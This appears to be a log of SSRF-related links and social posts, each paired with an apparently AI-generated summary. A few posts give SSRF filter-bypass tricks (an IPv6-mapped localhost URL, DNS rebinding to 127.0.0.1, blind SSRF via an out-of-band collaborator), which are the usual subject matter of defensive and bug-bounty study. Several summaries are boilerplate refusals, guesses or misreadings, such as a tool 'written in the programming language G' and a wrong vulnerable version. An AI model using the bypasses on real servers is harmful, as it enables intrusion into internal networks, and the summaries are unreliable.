| 219 | 2025-08-14 03:54:24 UTC | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Request Forgery | The content is a GitHub repository by swisskyrepo called "PayloadsAllTheThings" focusing on Server Side Request Forgery (SSRF). It likely contains a collection of payloads, techniques, and information related to SSRF vulnerabilities. The repository may serve as a resource for security researchers, developers, and anyone interested in understanding and mitigating SSRF risks in web applications. |
| 220 | 2025-08-14 03:54:22 UTC | SSRF payloads. Payloads with localhost | by Pravinrp | Medium | The content seems to focus on SSRF (Server-Side Request Forgery) payloads that involve using localhost. It appears to be an article or post written by Pravinrp on Medium. SSRF is a security vulnerability where an attacker can manipulate a web application to make requests on behalf of the server. Using payloads with localhost in SSRF attacks can be a way to exploit the vulnerability. The content likely delves into techniques or examples of how attackers can leverage SSRF with localhost for malicious purposes. |
| 221 | 2025-08-14 03:54:20 UTC | https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html | I'm sorry, but I cannot access external content such as blogs or websites. If you provide me with the main points or key ideas from the content, I'd be happy to help summarize it for you in 100 words or less. |
| 222 | 2025-08-14 03:54:18 UTC | https://link.medium.com/VoengTvAi1 | I'm unable to access external content such as the Medium link provided. If you can provide a brief overview or key points from the content, I'd be happy to help summarize it for you. |
| 223 | 2025-08-14 03:54:16 UTC | GitHub - teknogeek/ssrf-sheriff: A simple SSRF-testing sheriff written in G | The content refers to a GitHub repository named "teknogeek/ssrf-sheriff" which contains a simple SSRF-testing sheriff tool written in the programming language G. This tool is designed to help with testing for Server-Side Request Forgery (SSRF) vulnerabilities. It is likely a useful resource for developers and security professionals looking to enhance the security of their applications by identifying and addressing SSRF issues efficiently. |
| 224 | 2025-08-14 03:54:12 UTC | http://amp.kitploit.com/2019/08/b-xssrf-toolkit-to-detect-and-keep.html?amp=0 | The content is about a toolkit called "B-XSSRF" designed to detect and prevent Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides features like scanning for vulnerable URLs, detecting blind XSS, and generating payloads to test for SSRF. The toolkit aims to enhance security by identifying and mitigating these common web application vulnerabilities. |
| 225 | 2025-08-14 03:54:10 UTC | jdonsec/AllThingsSSRF: This is a collection of writeups, cheatsheets, video | The content is about a GitHub repository called "jdonsec/AllThingsSSRF" which contains a collection of writeups, cheatsheets, and videos related to Server-Side Request Forgery (SSRF). It seems to be a resource for individuals interested in learning more about SSRF vulnerabilities and how to address them. |
| 226 | 2025-08-14 03:54:08 UTC | https://link.medium.com/PJvAUvSFvZ | I'm sorry, but I cannot access external content such as the Medium link provided. If you could provide a brief overview or key points from the content, I would be happy to help summarize it for you in 100 words or less. |
| 227 | 2025-08-14 03:54:06 UTC | https://link.medium.com/eYV17swFvZ | I'm unable to access external content or specific URLs. If you provide me with the main points or key ideas from the content, I can help summarize it for you in 100 words or less. |
| 228 | 2025-08-14 03:54:04 UTC | https://github.com/SpiderMate/B-XSSRF | The link provided leads to a GitHub repository for a tool called B-XSSRF. It is likely a tool related to Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) vulnerabilities. The content on the GitHub page likely includes information about the tool, its purpose, features, and instructions for usage. It is recommended to visit the link to explore the tool further and understand its capabilities in addressing XSSRF vulnerabilities. |
| 229 | 2025-08-14 03:54:00 UTC | SSRF in the Wild. A totally unscientific analysis of… | by Vickie Li | The | The content titled "SSRF in the Wild" by Vickie Li discusses Server-Side Request Forgery (SSRF) vulnerabilities observed in real-world scenarios. The article likely provides an informal analysis of SSRF occurrences without scientific rigor. It may explore practical examples, implications, and potential risks associated with SSRF attacks. The focus is on understanding how SSRF vulnerabilities manifest in the wild rather than a formal study. |
| 230 | 2025-08-14 03:53:58 UTC | https://link.medium.com/oa2D2LupcZ | I'm sorry, but I cannot access external content such as the Medium link provided. If you can provide me with the main points or key ideas from the content, I'd be happy to help summarize it for you. |
| 231 | 2025-08-14 03:53:56 UTC | GitHub - allanlw/svg-cheatsheet: A cheatsheet for exploiting server-side SV | The content is about a GitHub repository named "svg-cheatsheet" created by allanlw. It is described as a cheatsheet for exploiting server-side SVG. The repository likely contains information, code snippets, or resources related to leveraging SVG (Scalable Vector Graphics) for server-side applications. It may provide guidance on how to use SVG effectively in server-side environments. |
| 232 | 2025-08-14 03:53:54 UTC | Server Side Request Forgery Prevention - OWASP Cheat Sheet Series | The content is about preventing Server Side Request Forgery (SSRF) and is part of the OWASP Cheat Sheet Series. SSRF is a vulnerability where an attacker can manipulate a server into making unintended requests, potentially accessing internal systems or sensitive data. The OWASP Cheat Sheet provides guidance on how to prevent SSRF attacks, which typically involve validating and sanitizing user input, restricting access to sensitive resources, and using whitelists to control allowed URLs. It is crucial for developers and security professionals to be aware of SSRF risks and implement preventive measures to secure their systems. |
| 233 | 2025-08-14 03:53:52 UTC | Server Side Request Forgery (SSRF) - Book of BugBounty Tips | The content is titled "Server Side Request Forgery (SSRF) - Book of BugBounty Tips." It likely discusses SSRF, a security vulnerability where an attacker can manipulate a server to make requests on their behalf. The content may provide tips and insights related to SSRF in bug bounty programs. |
| 234 | 2025-08-14 03:53:50 UTC | Bypassing SSRF Protection. There’s always more to do… | by Vickie Li | Medi | The content titled "Bypassing SSRF Protection" by Vickie Li discusses methods to bypass Server-Side Request Forgery (SSRF) protection measures. It highlights the continuous need for vigilance and improvement in security practices to prevent SSRF attacks. The article likely delves into techniques or strategies that attackers can use to circumvent SSRF protections, emphasizing the importance of staying updated on security measures to defend against such threats effectively. |
| 235 | 2025-08-14 03:53:48 UTC | https://link.medium.com/JzxK9eodaX | I'm unable to access external content such as the one you provided. If you can provide a brief overview or key points from the content, I'd be happy to help summarize it for you. |
| 236 | 2025-08-14 03:53:46 UTC | https://link.medium.com/HOGdT5ocfW | I'm unable to access external content such as the one you provided. If you can provide a brief overview or key points from the content, I'd be happy to help summarize it for you in 100 words or less. |
| 237 | 2025-08-14 03:53:44 UTC | The journey of Web Cache Firewall Bypass to SSRF to AWS credentials compr | The content discusses the progression from a Web Cache Firewall Bypass to Server-Side Request Forgery (SSRF) and ultimately obtaining AWS credentials through this process. It highlights the evolution of exploiting vulnerabilities, starting with bypassing web cache firewalls, moving on to SSRF attacks, and culminating in the compromise of AWS credentials. This journey showcases the potential risks and consequences of such security vulnerabilities being exploited by malicious actors. |
| 238 | 2025-08-14 03:53:40 UTC | From SSRF To RCE in PDFReacter. What is PDFReacter? - PDFReacter is a… | b | The content appears to discuss a potential security vulnerability in PDFReacter that could allow an attacker to escalate from Server-Side Request Forgery (SSRF) to Remote Code Execution (RCE). PDFReacter is likely a software or tool that processes PDF files. The focus seems to be on the security implications of this vulnerability and how it could be exploited by malicious actors. |
| 239 | 2025-08-14 03:53:38 UTC | Vimeo SSRF with code execution potential. - Harsh Jaiswal - Medium | The content discusses a security vulnerability in Vimeo that could lead to Server-Side Request Forgery (SSRF) with code execution potential. The vulnerability was identified by Harsh Jaiswal and is detailed in a Medium post. SSRF can be exploited to make unauthorized requests from the server, potentially leading to code execution. This type of vulnerability can pose a significant risk to the security of a system or application. It is crucial for organizations to address and patch such vulnerabilities promptly to prevent exploitation by malicious actors. |
| 240 | 2025-08-14 03:53:36 UTC | https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c | The content discusses a security vulnerability related to SVG xlink in libraries, leading to SSRF attacks and version fingerprinting. It highlights how attackers can exploit this vulnerability to gather information about the libraries used by a website. The article emphasizes the importance of addressing this issue to prevent potential security breaches. |
| 241 | 2025-08-14 03:53:34 UTC | SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2 | | The content discusses SSRF (Server Side Request Forgery), focusing on its types and ways to exploit it. It likely delves into the vulnerabilities associated with SSRF attacks and the methods attackers can use to exploit them. The article may provide insights into how SSRF can be used to manipulate servers into making unauthorized requests and accessing sensitive information. It is part two of a series, suggesting that it builds upon previous information shared in part one. |
| 242 | 2025-08-14 03:53:32 UTC | SSRF’s up! Real World Server-Side Request Forgery (SSRF) | The content mentions Server-Side Request Forgery (SSRF) and its real-world implications. SSRF is a security vulnerability where an attacker can manipulate a server to make requests on their behalf. This can lead to unauthorized access to internal systems, data theft, or server exploitation. It is crucial for developers to be aware of SSRF risks and implement proper security measures to prevent such attacks. |
| 243 | 2025-08-14 03:53:30 UTC | SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 | | The content is about SSRF (Server Side Request Forgery), focusing on its types and ways to exploit it. It appears to be the first part of a series discussing SSRF vulnerabilities and exploitation techniques. The content likely delves into the various forms of SSRF attacks and methods to leverage them for unauthorized access or data manipulation. This introductory part sets the stage for a deeper exploration of SSRF in subsequent parts of the series. |
| 244 | 2025-08-14 03:53:28 UTC | 0xdf hacks stuff | CTF solutions, malware analysis, home lab development | 0xdf hacks stuff is a platform that offers solutions for Capture The Flag (CTF) challenges, guides for malware analysis, and tips for developing a home lab environment. It focuses on sharing expertise in these areas to help individuals enhance their skills in cybersecurity and information security. The website provides valuable resources and insights for those interested in CTF competitions, analyzing malware, and setting up a home lab for practical learning and experimentation. |
| 245 | 2025-08-14 03:53:24 UTC | AWS takeover through SSRF in JavaScript – Gwendal Le Coguic | The content appears to discuss a potential security vulnerability known as Server-Side Request Forgery (SSRF) in JavaScript that could lead to an AWS takeover. This vulnerability could allow an attacker to manipulate a web application to make unauthorized requests to AWS services, potentially gaining control over them. It is important for developers to be aware of SSRF vulnerabilities and take steps to prevent them in their applications to protect against such attacks. |
| 246 | 2025-08-14 03:53:22 UTC | Security Bugs in Practice: SSRF via Request Splitting | The content discusses the practical implications of a security bug known as SSRF (Server-Side Request Forgery) that occurs through request splitting. SSRF allows attackers to manipulate a server into making unauthorized requests on their behalf. This vulnerability can be exploited to access sensitive information or resources on a server. The article likely delves into the technical details and potential risks associated with SSRF via request splitting, highlighting the importance of addressing such vulnerabilities to enhance system security. |
| 247 | 2025-08-14 03:53:20 UTC | Into the Borg – SSRF inside Google production network | OpnSec | The content titled "Into the Borg – SSRF inside Google production network | OpnSec" likely discusses a security vulnerability known as Server-Side Request Forgery (SSRF) within Google's production network. The article may delve into the implications of SSRF and how it could potentially be exploited within Google's infrastructure. The content is likely related to cybersecurity and may provide insights into the challenges and risks associated with SSRF vulnerabilities in a high-profile environment like Google's network. |
| 248 | 2025-08-14 03:53:18 UTC | Server Side Request Forgery (SSRF) Testing | by NoGe | InfoSec Write-ups | The content is about Server Side Request Forgery (SSRF) Testing, written by NoGe in an InfoSec Write-up. It likely covers information related to testing for SSRF vulnerabilities, which involve manipulating a server to make unintended requests on behalf of the attacker. The article may provide insights, techniques, or tools for identifying and mitigating SSRF risks in web applications. |
| 249 | 2025-08-14 03:53:12 UTC | How i converted SSRF TO XSS in jira. | by Ashish Kunwar | Medium | The content titled "How i converted SSRF TO XSS in jira" by Ashish Kunwar on Medium likely discusses a security vulnerability where Server-Side Request Forgery (SSRF) was converted to Cross-Site Scripting (XSS) in Jira. The author may explain how they identified and exploited this vulnerability, potentially highlighting the impact and implications of such a conversion. This content likely delves into the technical details of the vulnerability and the process of exploiting it to achieve XSS in the Jira platform. |
| 250 | 2025-08-11 20:13:15 UTC | Critical vulnerabilities in Xerox FreeFlow Core v8.0.4 (CVE-2025-8355 & CVE-2025-8356) could lead to SSRF & RCE attacks. Update to v8.0.5 immediately to secure your systems. Link: thedailytechfeed.com/critical-vulne #Vulnerabilities #Xerox #FreeFlow #CVE #Security #Update #SSRF #RCE | Critical vulnerabilities (CVE-2025-8355 & CVE-2025-8356) in Xerox FreeFlow Core v8.0.4 pose risks of SSRF & RCE attacks. Immediate update to v8.0.5 is necessary for system security. Visit thedailytechfeed.com/critical-vulne for more information. #Vulnerabilities #Xerox #FreeFlow #CVE #Security #Update #SSRF #RCE. |
| 251 | 2025-08-11 19:02:17 UTC | CVE-2025-8355: Xerox Issues Urgent Security Update | Xerox has released an urgent security update for CVE-2025-8355. The update addresses a critical security vulnerability in Xerox devices. Users are advised to apply the patch immediately to protect their systems from potential cyber threats. Stay informed about security updates and take necessary actions to safeguard your devices. |
| 252 | 2025-08-11 14:04:05 UTC | Xerox FreeFlow Core v8.0.4 has 2 critical flaws: CVE-2025-8355 SSRF CVE-2025-8356 Path Traversal RCE Fix: Update to v8.0.5 now! Paxion Cybersecurity helps organizations stay ahead of threats like these. #CyberSecurity #Xerox #Infosec #RCE #SSRF | Xerox FreeFlow Core v8.0.4 has two critical flaws: CVE-2025-8355 (SSRF) and CVE-2025-8356 (Path Traversal leading to RCE). The solution is to update to v8.0.5 immediately to address these vulnerabilities. Paxion Cybersecurity assists organizations in proactively managing such threats. #CyberSecurity #Xerox #Infosec #RCE #SSRF |
| 253 | 2025-08-11 10:56:27 UTC | Xerox FreeFlow Vulnerabilities leads to SSRF and RCE Attacks | Xerox FreeFlow software vulnerabilities have been identified, potentially enabling Server-Side Request Forgery (SSRF) and Remote Code Execution (RCE) attacks. These vulnerabilities pose security risks that could allow malicious actors to manipulate server requests and execute unauthorized code. It is crucial for users of Xerox FreeFlow software to be aware of these vulnerabilities and take necessary precautions to mitigate the associated risks. |
| 254 | 2025-08-11 10:56:25 UTC | Xerox FreeFlow Flaws Enable SSRF and Remote Code Execution | The Xerox FreeFlow software has vulnerabilities that allow Server-Side Request Forgery (SSRF) attacks and remote code execution. These flaws can be exploited by attackers to manipulate requests from the server and execute malicious code remotely. It poses a significant security risk and highlights the importance of patching software to prevent exploitation. |
| 255 | 2025-08-11 10:56:24 UTC | Xerox FreeFlow Flaws Enable SSRF and Remote Code Execution | The Xerox FreeFlow software has been found to have vulnerabilities that allow for Server-Side Request Forgery (SSRF) and remote code execution. These flaws can potentially be exploited by attackers to manipulate server requests and execute malicious code remotely. It is crucial for users of Xerox FreeFlow to be aware of these vulnerabilities and take necessary precautions to secure their systems against potential attacks. |
| 256 | 2025-08-02 15:28:35 UTC | Just wrapped up the SSRF HR room on @RealTryHackMe! Learned how attackers misuse servers to reach internal services & how to defend against it. Up next: more handson security challenges! tryhackme.com/room/ssrfhr #CyberSecurity #SSRF #TryHackMe #Infosec | The content discusses completing a room on SSRF HR on TryHackMe, focusing on attackers misusing servers to access internal services and defense strategies. The next step involves engaging in more hands-on security challenges. The post emphasizes cybersecurity, SSRF awareness, and TryHackMe participation. |
| 257 | 2025-07-31 03:23:26 UTC | Another Byte Bites the Dust - How XBOW Turned a Blind SSRF into a File Reading Oracle - xbow.com/blog/xbow-titi by @pwntester / @Xbow #SSRF #LFI #FileDisclosure #SecurityResearch #BugBounty #CloudSecurity #WebSecurity #OffensiveSecurity #AppSec #PathTraversal | The content discusses how XBOW converted a blind SSRF vulnerability into a file reading oracle. It highlights the importance of security research, bug bounty programs, and cloud/web security. The post mentions relevant hashtags like SSRF, LFI, FileDisclosure, and PathTraversal. The focus is on offensive security and application security. The content also includes a link to further information. |
| 258 | 2025-07-30 16:19:07 UTC | #CVE-2025-54381 | BentoML - Unauthenticated SSRF (Critical) #BentoML versions 1.4.0 to 1.4.18 are vulnerable to an unauthenticated Server-Side Request Forgery (#SSRF) due to improper validation of user-provided URLs in file upload handlers. This allows attackers to force the | BentoML versions 1.4.0 to 1.4.18 have a critical unauthenticated SSRF vulnerability (#CVE-2025-54381) due to inadequate validation of user-provided URLs in file upload handlers. Attackers can exploit this flaw to trigger SSRF. |
| 259 | 2025-07-30 09:18:47 UTC | CVE-2025-54381: Critical SSRF in BentoML BentoML is an open-source Python framework to package & deploy ML models as APIs. Versions 1.4.19 let attackers trigger internal HTTP requests via uploads. Patch now! #CVE202554381 #BentoML #SSRF #Python #MachineLearning #AI #MLOps | A critical Server-Side Request Forgery (SSRF) vulnerability (CVE-2025-54381) has been identified in BentoML, an open-source Python framework for deploying ML models as APIs. Attackers can exploit version 1.4.19 to trigger internal HTTP requests through uploads. It is crucial to apply the patch immediately to mitigate this security risk. #BentoML #SSRF #Python #MachineLearning #AI #MLOps. |
| 260 | 2025-07-30 02:18:53 UTC | A critical SSRF vulnerability in BentoML's file upload handling allows unauthenticated remote attackers to perform internal network reconnaissance and steal cloud metadata credentials from AI applications. #BentoML #SSRF #AISecurity #CVE #Cybersecurity | A serious SSRF vulnerability in BentoML's file upload feature enables unauthenticated remote attackers to conduct internal network reconnaissance and extract cloud metadata credentials from AI applications. This flaw poses a significant security risk and highlights the importance of addressing vulnerabilities promptly to prevent unauthorized access and data breaches. #BentoML #SSRF #AISecurity #CVE #Cybersecurity |
| 261 | 2025-07-28 16:46:24 UTC | Severe Salesforce Tableau Vulnerabilities Enable Remote Code Execution | The content discusses severe vulnerabilities in Salesforce Tableau that allow remote code execution. These vulnerabilities pose a significant threat to the security of Tableau users, potentially enabling attackers to execute malicious code on affected systems. It highlights the importance of promptly addressing these vulnerabilities to prevent unauthorized access and potential data breaches. Users are advised to stay informed about security updates and patches released by Salesforce to mitigate the risks associated with these vulnerabilities. |
| 262 | 2025-07-28 06:13:30 UTC | HIGH-severity SSRF flaw in ssrfcheck 1.2.0 lets attackers target multicast IPs! Update now to stay secure. #OffSeq #SSRF #infosec | A high-severity SSRF flaw in ssrfcheck 1.2.0 allows attackers to target multicast IPs. It is crucial to update to the latest version for security. Stay secure by taking immediate action to address this vulnerability. #OffSeq #SSRF #infosec. |
| 263 | 2025-07-28 03:03:45 UTC | Salesforce patched eight critical flaws in Tableau Server including RCE database exposure and SSRF vulnerabilities urging users to update immediately. #TableauServer #SalesforceSecurity #RCE #SSRF #CybersecurityAlert securityonline.info/rce-ssrf-data- | Salesforce addressed eight critical vulnerabilities in Tableau Server, such as RCE, database exposure, and SSRF issues, advising users to promptly update their systems. This urgent security alert highlights the importance of staying protected against cyber threats. #TableauServer #SalesforceSecurity #RCE #SSRF #CybersecurityAlert. |
| 264 | 2025-07-27 18:03:54 UTC | Critical SSRF vuln (CVE-2025-8228) found in ChanCMS = 3.1.2! Attackers can exploit targetUrl for unauthorized access to internal server resources. Protect your systems: UPDATE to v3.1.3 immediately! #CyberSecurity #Vulnerability #SSRF tenable.com/cve/CVE-2025-8 | A critical SSRF vulnerability (CVE-2025-8228) was discovered in ChanCMS version 3.1.2, allowing attackers to exploit the 'targetUrl' and gain unauthorized access to internal server resources. It is crucial to update to version 3.1.3 immediately to protect systems. The vulnerability poses a significant risk to cybersecurity and highlights the importance of staying vigilant against such threats. More information can be found at tenable.com/cve/CVE-2025-8. |
| 265 | 2025-07-24 17:13:36 UTC | Ethical Disclaimer This content is provided for educational purposes only. Do not test or exploit any system without explicit permission. #BugBounty #XSS #SSRF #CyberSecurity #FilterBypass #PayloadCrafting #WebAppSecurity #EthicalHacking #InfoSecEducation #RedTeam | The content serves educational purposes only, cautioning against testing or exploiting systems without permission. It includes hashtags related to cybersecurity topics like Bug Bounty, XSS, SSRF, Filter Bypass, Payload Crafting, Web App Security, Ethical Hacking, InfoSec Education, and Red Team. The ethical disclaimer emphasizes responsible behavior in the realm of cybersecurity and hacking practices. |
| 266 | 2025-07-23 21:31:34 UTC | CISA Issues Alert on Exploited SysAid Vulnerabilities: Patch Deadline August 13 | The Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert regarding exploited vulnerabilities in SysAid software. Users are urged to apply patches by August 13 to mitigate the risks associated with these vulnerabilities. Failure to patch could leave systems exposed to potential cyber threats. Stay updated on security alerts and take prompt action to protect your systems. |
| 267 | 2025-07-23 08:01:33 UTC | CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF | The Cybersecurity and Infrastructure Security Agency (CISA) issued a warning about active attacks targeting vulnerabilities in SysAid software. These flaws allow attackers to access files remotely and conduct Server-Side Request Forgery (SSRF) attacks. Organizations using SysAid should be vigilant and apply patches to mitigate the risk of exploitation. |
| 268 | 2025-07-23 07:43:48 UTC | New #CVE Record: CVE-2025-8020 All #Snyk versions of the package private-ip are #vulnerable to Server-Side Request Forgery (#SSRF) where an attacker can provide an IP or #hostname that resolves to a #multicast IP address (224.0.0.0/4) which is not included as part of the private | The content discusses a new CVE record, CVE-2025-8020, indicating that all Snyk versions of the package private-ip are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability allows an attacker to input an IP or hostname that resolves to a multicast IP address (224.0.0.0/4), not included in the private IP range. This poses a security risk. |
| 269 | 2025-07-23 02:53:31 UTC | A critical unauthenticated SSRF vulnerability (CVE-2025-54122 CVSS 10.0) in Manager's accounting software allows bypassing network isolation and exfiltrating sensitive data from cloud environments. #Managerio #SSRF #Cybersecurity #CloudHack #Accounting | A severe unauthenticated SSRF vulnerability (CVE-2025-54122, CVSS 10.0) in Manager's accounting software enables circumventing network isolation and extracting sensitive data from cloud environments. This flaw poses a significant cybersecurity risk and highlights the importance of addressing vulnerabilities promptly to prevent potential data breaches. #Managerio #SSRF #Cybersecurity #CloudHack #Accounting |
| 270 | 2025-07-22 21:03:45 UTC | App blocks 127.0.0.1? Cool. Register a domain pointing to it Use a DNS rebinding service like: Custom NS server A record to 127.0.0.1 Then call: App thinks its external. #bugbounty #ssrf | The content discusses a technique to bypass an app blocking 127.0.0.1 by registering a domain pointing to it and using a DNS rebinding service. By setting up a custom NS server with an A record to 127.0.0.1, the app can be tricked into thinking the connection is external. This method is suggested for bug bounty and SSRF (Server-Side Request Forgery) purposes. |
| 271 | 2025-07-22 01:38:40 UTC | CRITICAL SSRF in Manager-io Manager! Unauthenticated attackers can access internal data. Patch to 25.7.21.2525 ASAP. #OffSeq #SSRF #CyberSecurity | A critical Server-Side Request Forgery (SSRF) vulnerability in Manager-io Manager allows unauthenticated attackers to access internal data. It is advised to patch the system to version 25.7.21.2525 immediately to mitigate the risk. This vulnerability poses a serious threat to cybersecurity and highlights the importance of timely updates and vigilance against SSRF attacks. #OffSeq #SSRF #CyberSecurity. |
| 272 | 2025-07-20 04:28:44 UTC | SSRF = Server-Side Request Forgery Target makes HTTP request on your behalf. Try: url= url= Sometimes it leads to AWS keys. #ssrf #BugBounty #infosec | SSRF (Server-Side Request Forgery) involves a target making HTTP requests on your behalf, potentially exposing AWS keys. This vulnerability is commonly targeted in Bug Bounty programs and falls under the realm of information security. The content emphasizes the risks associated with SSRF and encourages further exploration of the topic through provided URLs and hashtags. |
| 273 | 2025-07-19 09:38:37 UTC | SSRF Vulnerability Internal Port Scanning & Non-sensitive File Read Bypassed with: http://[0:0:0:0:0:ffff:127.0.0.1] (Localhost IPv6-mapped IPv4) #BugBounty #ssrf | The content discusses a security vulnerability known as SSRF (Server-Side Request Forgery) where internal port scanning and non-sensitive file reading were bypassed using a specific URL format: http://[0:0:0:0:0:ffff:127.0.0.1]. This URL represents a localhost IPv6-mapped IPv4 address. The post highlights this bypass technique in the context of a Bug Bounty program. |
| 274 | 2025-07-17 18:18:36 UTC | eWPTX 3 months Premium: $299.50 (50% off) Advanced blind #SQLinjection techniques DOM-based #XSS exploitation Server-side request forgery (#SSRF) chains And more! Hands-on training that separates script kiddies from security pros. | Get eWPTX certification plus 3 months Premium access for $299.50 (50% off). The course covers advanced blind SQL injection techniques, DOM-based XSS exploitation, SSRF chains, and more. It offers hands-on training to distinguish between amateurs and security professionals. |
| 275 | 2025-07-17 18:18:35 UTC | eWPTX 3 months Premium: $299.50 (50% off) Advanced blind #SQLinjection techniques DOM-based #XSS exploitation Server-side request forgery (#SSRF) chains And more! Hands-on training that separates script kiddies from security pros. | Get eWPTX with 3 months Premium for $299.50 (50% off). The course covers advanced blind SQL injection techniques, DOM-based XSS exploitation, SSRF chains, and more. It offers hands-on training to distinguish script kiddies from security professionals. |
| 276 | 2025-07-17 18:18:34 UTC | eWPTX 3 months Premium: $299.50 (50% off) Advanced blind #SQLinjection techniques DOM-based #XSS exploitation Server-side request forgery (#SSRF) chains And more! Hands-on training that separates script kiddies from security pros. | Get eWPTX with 3 months Premium for $299.50 (50% off). The training covers advanced blind SQL injection techniques, DOM-based XSS exploitation, SSRF chains, and more. It aims to distinguish security professionals from amateurs. |
| 277 | 2025-07-17 03:43:14 UTC | Rooted in stillness The Banyan tree reminds us to grow inward toward the soul. Discover how at #SpiritualWisdom #InnerGrowth #SSRF #BanyanTree #SpiritualPractice #SpiritualSymbols | The content highlights the symbolism of the Banyan tree, encouraging inner growth towards the soul through stillness. It invites exploration of spiritual wisdom, inner growth, and spiritual practices associated with the Banyan tree as a spiritual symbol. The message emphasizes the importance of introspection and connecting with one's inner self for personal development and spiritual enlightenment. |
| 278 | 2025-07-16 16:18:26 UTC | Just dropped a banger: How I Used SSRF to Gain Admin Access Thread or blog your call Medium: Substack (free): #bugbounty #infosec #cybersecurity #ethicalhacking #ssrf #websecurity | The content discusses using Server-Side Request Forgery (SSRF) to gain admin access, shared as a thread or blog post. It is available on Medium and Substack for free. The focus is on bug bounty, infosec, cybersecurity, ethical hacking, SSRF, and web security. The post highlights the author's success in utilizing SSRF for gaining admin privileges. |
| 279 | 2025-07-15 23:13:42 UTC | Rooted in stillness The Banyan tree reminds us to grow inward toward the soul. Discover how at #SpiritualWisdom #InnerGrowth #SSRF #BanyanTree #SpiritualPractice #SpiritualSymbols | The content highlights the symbolism of the Banyan tree, emphasizing the importance of growing inward towards the soul and spiritual growth. It encourages exploring spiritual wisdom, inner growth, and practices associated with the Banyan tree as a spiritual symbol. The message suggests finding stillness and connection to the soul through introspection and spiritual practices. |
| 280 | 2025-07-14 14:04:27 UTC | All about SSRF !! Different ways to test SSRF #ssrf #cybersecurity #BugBounty #Security #vulnerability | The content discusses Server-Side Request Forgery (SSRF) and various methods to test for it, emphasizing its relevance in cybersecurity, bug bounty programs, and vulnerability assessments. It provides insights into identifying and mitigating SSRF risks, highlighting the importance of understanding and addressing this security issue. The content aims to educate readers on the significance of SSRF testing in enhancing system security and protecting against potential exploits. |
| 281 | 2025-07-12 06:58:26 UTC | Blind SSRF via Burp Collaborator 1 App fetches URLs (PDF gen webhook etc.) 2 Send URL pointing to Burp Collaborator 3 No visible response but OAST logs the request 4 Confirms SSRF vulnerability No output no bug #bugbounty #ssrf #burp #oast | The content discusses a method for exploiting a Blind SSRF vulnerability using Burp Collaborator. It involves sending URLs to Burp Collaborator through an application that fetches URLs like PDF generation or webhooks. Despite no visible response, the Out-of-Band Application Security Testing (OAST) logs the request, confirming the SSRF vulnerability. The key takeaway is that even if there is no visible output, the presence of an SSRF vulnerability should not be overlooked. This information is relevant for bug bounty hunters and those interested in web security testing. |
| 282 | 2025-07-12 05:31:44 UTC | Apache HTTP Server 2.4.64 Update Patches Eight Security Vulnerabilities | The Apache HTTP Server 2.4.64 update addresses eight security vulnerabilities. This update aims to enhance the security of the server by patching these vulnerabilities. It is crucial for users to install this update promptly to protect their systems from potential security threats. |
| 283 | 2025-07-12 04:02:26 UTC | (PDF) Surgical stabilization of rib fractures improves survival in functionally dependent trauma patients | The study suggests that surgical stabilization of rib fractures can enhance survival rates in trauma patients who are functionally dependent. The procedure may offer significant benefits for this specific patient population. |
| 284 | 2025-07-11 12:16:34 UTC | Apache HTTP Server 2.4.64 Released With Patch for 8 Vulnerabilities | Apache HTTP Server version 2.4.64 has been released to address 8 vulnerabilities. This update includes patches to fix these security issues. Users are advised to update their Apache HTTP Server installations to the latest version to ensure their systems are protected against potential exploits. |
| 285 | 2025-07-09 20:48:55 UTC | Kicked things off by finding an Blind SSRF vulnerability unfortunately it turned out to be a duplicate. Still it feels great to be back in the game. Hoping for better luck ahead! #BugBounty #SSRF #Cybersecurity #HackerLife | The content describes finding a Blind SSRF vulnerability, only to discover it was a duplicate. Despite this setback, the individual is excited to be back in the cybersecurity game and is hopeful for better opportunities in the future. The post includes hashtags related to Bug Bounty, SSRF, Cybersecurity, and Hacker Life. |
| 286 | 2025-07-09 10:48:30 UTC | A10:2021 Server-Side Request Forgery (SSRF) Attackers trick your server into making requests to unintended internal or external resources. Be careful where your server is reaching out! #SSRF #NetworkSecurity | A10:2021 highlights Server-Side Request Forgery (SSRF) attacks where attackers manipulate servers to make unauthorized requests. It warns about the risks of servers accessing unintended internal or external resources. The importance of vigilance in monitoring server connections is emphasized for maintaining network security. #SSRF #NetworkSecurity. |
| 287 | 2025-07-09 07:46:27 UTC | CISA Adds Four Critical Vulnerabilities to KEV Catalog Due to Active Exploitation | The Cybersecurity and Infrastructure Security Agency (CISA) has identified and added four critical vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog due to ongoing exploitation. These vulnerabilities pose significant risks to systems and networks, prompting CISA to highlight them for immediate attention and mitigation. Organizations are advised to prioritize patching these vulnerabilities to enhance their cybersecurity posture and protect against potential attacks. |
| 288 | 2025-07-08 13:46:27 UTC | CISA Warns of Zimbra Collaboration Suite (ZCS) Vulnerability Exploited in Attacks | The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a vulnerability in the Zimbra Collaboration Suite (ZCS) being exploited in attacks. The vulnerability poses a risk to organizations using ZCS, potentially allowing malicious actors to compromise systems. Organizations are advised to apply patches and implement necessary security measures to protect against exploitation. |
| 289 | 2025-07-07 12:48:54 UTC | SSRF (Server-Side Request Forgery) lets attackers trick a server into making requests to internal or external systems. Can expose internal data & services. Always validate user-supplied URLs. #SSRF #CyberSecurity #BugBounty | SSRF allows attackers to manipulate servers to make unauthorized requests to internal or external systems, risking exposure of sensitive data. To prevent this, it's crucial to validate user-provided URLs to mitigate SSRF vulnerabilities. This practice enhances cybersecurity and is essential for bug bounty programs. #SSRF #CyberSecurity #BugBounty |
| 290 | 2025-07-06 16:33:46 UTC | Understanding #SSRF: Abusing Server Trust from the Inside Out blog.sucuri.net/2025/06/unders | The content discusses Server-Side Request Forgery (SSRF) attacks, focusing on exploiting server trust from within the system. It highlights the risks associated with SSRF attacks and how attackers can manipulate servers to access sensitive information or perform malicious actions. The article aims to increase awareness about SSRF vulnerabilities and the importance of securing servers to prevent such attacks. It provides insights into how attackers can abuse server trust and offers guidance on mitigating these risks to enhance cybersecurity measures. |
